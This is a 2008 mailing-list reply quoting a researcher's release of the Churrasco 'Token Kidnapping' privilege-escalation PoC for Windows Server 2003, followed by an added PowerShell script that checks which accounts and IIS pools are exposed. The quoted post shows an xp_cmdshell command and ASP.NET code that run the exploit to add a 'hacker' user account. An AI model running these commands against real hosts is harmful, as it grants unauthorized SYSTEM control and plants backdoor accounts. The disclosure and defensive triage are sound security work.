Good stuff, worked on Win2k3 CN SP1

2008/10/9 tr4c3 <[EMAIL PROTECTED]>

>
> It has been a long time since the Token Kidnapping presentation
> (http://www.argeniss.com/research/TokenKidnapping.pdf) was published, so I
> decided to release a PoC exploit for Win2k3 that allows executing code
> under the SYSTEM account.
>
> Basically, if you can run code under any service in Win2k3 then you can
> own Windows, because Windows service accounts can impersonate.
> Other processes (not services) that can impersonate are IIS 6 worker
> processes, so if you can run code from an ASP .NET or classic ASP web
> application then you can own Windows too. If you provide shared
> hosting services then I would recommend not allowing users to run this
> kind of code from ASP.
>
>
> -SQL Server is a nice target for the exploit if you are a DBA and want
> to own Windows:
>
> exec xp_cmdshell 'churrasco "net user /add hacker"'
>
>
> -Exploiting IIS 6 with ASP .NET :
> ...
> // Launch the PoC from inside the w3wp.exe worker process (IIS 6) and
> // return its output to the browser. The argument is the command that
> // churrasco.exe runs once it has obtained the SYSTEM token.
> System.Diagnostics.Process myP = new System.Diagnostics.Process();
> myP.StartInfo.RedirectStandardOutput = true;
> myP.StartInfo.FileName = Server.MapPath("churrasco.exe");
> myP.StartInfo.UseShellExecute = false;   // required for output redirection
> myP.StartInfo.Arguments = " \"net user /add hacker\" ";
> myP.Start();
> string output = myP.StandardOutput.ReadToEnd();
> Response.Write(output);
> ...
>
>
> You can find the PoC exploit here
> http://www.argeniss.com/research/Churrasco.zip
>
> Enjoy.
>  Posted by Cesar Cerrudo at 4:10 PM
>


-- 
BLOG: http://www.blogjava.net/baicker

--~--~---------~--~----~------------~-------~--~----~
 To post to this group, send email to [email protected]
 To unsubscribe from this group, send email to [EMAIL PROTECTED]
-~----------~----~----~----~------~----~------~--~---
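The condition the quoted post describes is simple to state: on Win2k3, code running under a token that holds SeImpersonatePrivilege (service accounts, and the IIS 6 worker process) can reach SYSTEM. The triage script below is an added example, not part of the original post or of the Churrasco PoC. It answers the three questions a defender or tester would ask on such a host: does my current token hold an impersonation privilege, which running services sit under the accounts that hold it by default, and what identity does each IIS 6 application pool run as. It assumes whoami.exe (shipped with Win2k3), the Win32_Service WMI class, PowerShell 2.0 for ConvertFrom-Csv, and, for the last step, the IIS 6 WMI provider in root\MicrosoftIISv2.

```powershell
# Added triage script (not from the post or the Churrasco PoC).
# Assumes: whoami.exe, Win32_Service via WMI, PowerShell 2.0 (ConvertFrom-Csv),
# and the IIS 6 WMI provider (root\MicrosoftIISv2) for the app pool check.

$impersonationPrivs = @('SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege')

# 1. The token this script runs under.
#    /nh drops the header row so column names do not depend on the system
#    locale (the original reply was from a Chinese Win2k3). Privilege names
#    themselves are never localized. 'whoami /priv' lists disabled privileges
#    too; a process can enable its own, so presence matters, not State.
$tokenPrivs = whoami /priv /fo csv /nh | ConvertFrom-Csv -Header Name, Description, State
$held = @($tokenPrivs | Where-Object { $impersonationPrivs -contains $_.Name })
if ($held.Count -gt 0) {
    $names = ($held | ForEach-Object { $_.Name }) -join ', '
    Write-Output "Token holds: $names"
    Write-Output "-> code executing in this context can escalate to SYSTEM via Token Kidnapping"
} else {
    Write-Output "Token holds no impersonation privilege; Token Kidnapping does not apply here"
}

# 2. Running services under the accounts that hold those privileges by default.
#    Each is a process whose compromise is equivalent to SYSTEM; this is the
#    list to shrink, or to move onto dedicated accounts without the privilege.
$defaultImpersonators = @('LocalSystem', 'NT AUTHORITY\NetworkService', 'NT AUTHORITY\LocalService')
Write-Output "`nRunning services under impersonation-capable accounts:"
Get-WmiObject Win32_Service |
    Where-Object { $_.State -eq 'Running' -and $defaultImpersonators -contains $_.StartName } |
    Select-Object Name, StartName, PathName |
    Format-Table -AutoSize

# 3. IIS 6 application pools. The post singles out w3wp.exe because ASP /
#    ASP.NET code runs inside it with the pool identity's privileges, and the
#    default identity (NetworkService) holds SeImpersonatePrivilege.
$pools = Get-WmiObject -Namespace 'root\MicrosoftIISv2' -Class IIsApplicationPoolSetting -ErrorAction SilentlyContinue
if ($pools) {
    Write-Output "`nIIS 6 application pool identities:"
    $pools | ForEach-Object {
        $pool = $_
        # AppPoolIdentityType: 0 LocalSystem, 1 LocalService, 2 NetworkService, 3 specific user
        $identity = switch ($pool.AppPoolIdentityType) {
            0 { 'LocalSystem' }
            1 { 'NT AUTHORITY\LocalService' }
            2 { 'NT AUTHORITY\NetworkService' }
            3 { $pool.WAMUserName }
            default { "unknown ($($pool.AppPoolIdentityType))" }
        }
        New-Object PSObject -Property @{ Pool = $pool.Name; Identity = $identity }
    } | Format-Table Pool, Identity -AutoSize
}
```

Run it from the context you care about: inside an xp_cmdshell call, from a test ASP.NET page, or from a service's own account. A pool configured with a specific user (type 3) is only safer if that user was not granted SeImpersonatePrivilege, which the first step tells you when run from within that pool. Note that Microsoft later shipped a fix for this class of token-handling weakness in MS09-012 (April 2009); the check above remains useful for deciding which accounts on a host are effectively SYSTEM.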
